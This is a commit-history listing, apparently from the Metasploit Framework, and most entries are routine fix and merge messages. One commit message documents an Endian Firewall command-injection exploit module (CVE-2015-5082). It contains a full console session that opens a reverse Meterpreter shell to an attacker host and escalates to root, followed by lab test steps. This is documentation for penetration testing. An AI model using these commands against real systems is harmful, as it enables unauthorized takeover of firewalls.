Commit Graph

34158 Commits (02ace9218b07a16b04f3ae09477479da2c07e550)

Author SHA1 Message Date
Ben Lincoln 02ace9218b Added handling for HTTP 401 (Authorization Required) response from target.
Added Exploit DB entries to references list.

Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
Ben Lincoln db721dff8e Cleaned up double-negative logic.
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
Ben Lincoln 6ceb734972 Replaced standard option TIMEOUT with advanced option
HTTPClientTimeout per void-in's request.

Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
Ben Lincoln 3d32438b34 Added missing closing paren in description text. 2015-06-30 12:43:31 -07:00
Ben Lincoln e929dec829 Re-formatted and tweaked the module description. 2015-06-30 12:42:17 -07:00
Ben Lincoln ce61bcd3b4 Removed a trailing space from line 40. 2015-06-29 22:48:16 -07:00
aos 13dc181f1c Exploit Module: Endian Firewall Proxy Password Change Command Injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
	  distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
	- Be sure to pick a valid IP for the "Green" network interface, as
	  you will use it to access a web GUI to complete the configuration
	- If prompted to create a root/SSH password and/or web admin
	  password, make a note of them. Well, make a note of the web admin
	  password - the exploit module will let you change the root
	  password later if you want to. This step is dependent on the
	  version selected - some will prompt, others default the values to
	  "endian".
	- Once the OS-level configuration is complete, access the web
	  interface to complete the setup. If you used 172.16.47.1 for the
	  "Green" interface, then the URL will be
	  https://172.16.47.1:10443/
	- If the web interface is not accessible, reboot the VM (in some
	  versions, the web interface does not come up until after the
	  first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
	  the username/password is admin/endian.
	- Use the second NIC for the "Red" interface. It will not actually
	  be used during this walkthrough, so feel free to specify a bogus
	  address on a different/nonexistent subnet. Same for its default
	  gateway.
	- Once the base configuration is complete, access the main web
	  interface URL again.
	- Switch to the Proxy tab.
	- Enable the HTTP proxy.
	- Click Save (or Apply, depending on version).
	- If prompted to apply the settings, do so.
	- Click on the Authentication sub-tab.
	- Make sure the Authentication Method is Local (this should be the
	  default).
	- Click the _manage users_ (Or _User management_, etc., depending
	  on version) button.
	- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
	- Enter "proxyuser" for the username, and "password123" for the
	  password, or modify the directions below this point accordingly.
	- Click the _Create user_ button.
	- If prompted to apply the settings, do so.

Module test	process:
  From within the MSF console, execute these commands:

    use exploit/linux/http/efw_chpasswd_exec
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST [YOUR_HOST_IP]
    set LPORT 443
    set RHOST [ENDIAN_GREEN_IP]
    set EFW_USERNAME proxyuser
    set EFW_PASSWORD password123
    exploit

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
	uname -a
	sudo -l
	sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
William Vu a30144f9ab
Land #5623, ipmi_dumphashes NoMethodError fix 2015-06-29 02:44:44 -05:00
HD Moore afa442ad89 Fix a stack trace with ipmi_dumphashes when no database was configured. 2015-06-29 00:46:35 -05:00
Brent Cook 3c16f8d4f0
Land #5618, fix unique session URIs for stageless http/s 2015-06-27 10:52:54 -05:00
Brent Cook bb43f7e30f use the correct transport for x64/meterpreter_reverse_https 2015-06-27 10:50:54 -05:00
OJ 007da4af41 Force :init_connect for stageless 2015-06-27 18:21:15 +10:00
Brent Cook 10a6945737
Land #5617, record the success on which we stopped (fixes #5616) 2015-06-26 18:27:49 -05:00
jvazquez-r7 52b49503a0
Land #5498, @hmoore-r7's patch for a number of Net::DNS/enum_dns issues 2015-06-26 18:25:03 -05:00
wchen-r7 b4656f43a4 Fix #5616, Save username before stop_on_success breaks the task
Fix #5616
2015-06-26 18:04:18 -05:00
jvazquez-r7 093f339f6b
Land #5268, @Meatballs1's post windows module to retrieve Bitlocker Recovery Keys from AD 2015-06-26 17:07:36 -05:00
William Vu 326bec0a1f
Land #5581, s/shell_command_token/cmd_exec/ 2015-06-26 16:59:40 -05:00
jvazquez-r7 600a296291
Do minor cleanup 2015-06-26 16:51:00 -05:00
jvazquez-r7 a10fa02b00
Land #5606, @wchen-r7's glassfish fixes 2015-06-26 14:12:50 -05:00
wchen-r7 3b5e2a0c6e Use TARGETURI 2015-06-26 14:02:17 -05:00
wchen-r7 da779b1101 Fix login for 9.1 2015-06-26 13:52:44 -05:00
wchen-r7 b46e1be22f
Land #5371, Add file checking to the on_new_session cleanup 2015-06-26 13:33:57 -05:00
William Vu 8e848c3369
Land #5613, @todb-r7's module cleanup 2015-06-26 12:54:36 -05:00
William Vu c04490e5eb Remove comma before coordinating conjunction
An independent clause does not follow.
2015-06-26 12:50:37 -05:00
Tod Beardsley 31eedbcfa0
Minor cleanups on recent modules
Edited modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
first landed in #5577, MS15-034 HTTP.SYS Information Disclosure

Edited modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
first landed in #5605, CVE-2015-3105 flash exploit

Edited modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
first landed in #5559, Adobe Flash Player ShaderJob Buffer Overflow

Edited modules/auxiliary/test/report_auth_info.rb first landed in #5540,
@wchen-r7's changes for multiple auxiliary modules to use the new cred
API
2015-06-26 12:18:33 -05:00
wchen-r7 0c608e2a4c Change doc for boolean args 2015-06-26 12:01:53 -05:00
jvazquez-r7 12188f1a00
Merge conflict solving changes 2015-06-26 11:57:49 -05:00
jvazquez-r7 7ccc86d338
Use cmd_exec 2015-06-26 11:54:19 -05:00
jvazquez-r7 31b7ef49d6
Solve conficts 2015-06-26 11:36:17 -05:00
wchen-r7 eba1e24b96
Land #5605, CVE-2015-3105 flash exploit 2015-06-26 10:30:10 -05:00
Trevor Rosen 84c0e62fd3
Land #5493, update OWA scanner creds persistence 2015-06-26 08:46:27 -05:00
wchen-r7 c70e38a14e Do more reporting 2015-06-25 22:39:56 -05:00
wchen-r7 5ef4cc2bb4 Save creds 2015-06-25 17:10:20 -05:00
wchen-r7 1a371b11b0 Update description 2015-06-25 17:04:31 -05:00
Tod Beardsley 15f9fc5d8f
Land #5599, YARD for fuzzer.rb 2015-06-25 14:37:55 -05:00
jvazquez-r7 e49c36998c
Fix indentation 2015-06-25 14:12:23 -05:00
jvazquez-r7 a87d4e5764
Add flash_exploiter template 2015-06-25 13:52:57 -05:00
jvazquez-r7 ee0377ca16
Add module for CVE-2015-3105 2015-06-25 13:35:01 -05:00
Mo Sadek 31c35715fc YARD Documentation for file_info.rb 2015-06-25 11:08:35 -05:00
root 63f584cbfd Add last_attempted_at 2015-06-25 12:08:38 +05:00
wchen-r7 c330d10403 Make SSL as a basic option
Also:

Fix #5558
2015-06-25 02:06:51 -05:00
wchen-r7 5c98da05fb This works for Glassfish 4.0 & 9.1 2015-06-25 01:58:24 -05:00
wchen-r7 c826785ebb Fix auth bypass 2015-06-24 19:49:04 -05:00
wchen-r7 8e4fa80728 This looks good so far 2015-06-24 19:30:02 -05:00
Brent Cook 5c65c58fdf
Land #5598:handle nil or short machine_ids gracefully 2015-06-24 19:11:08 -05:00
OJ 29a5194cc0
Land #5955 : Support older targets for ms15-051 2015-06-25 09:39:46 +10:00
OJ ae41f2bfa0 Update exploit binaries for ms15-051 2015-06-25 09:33:15 +10:00
Spencer McIntyre 2206a6af73 Support older targets x86 for MS15-051 2015-06-25 09:33:15 +10:00
OJ 4fc4cd86db
Update exploit binaries for ms15-051 2015-06-25 09:28:38 +10:00
OJ e3d1a34c66
Land #5601 : Bump session verify default to 30 seconds 2015-06-25 07:42:17 +10:00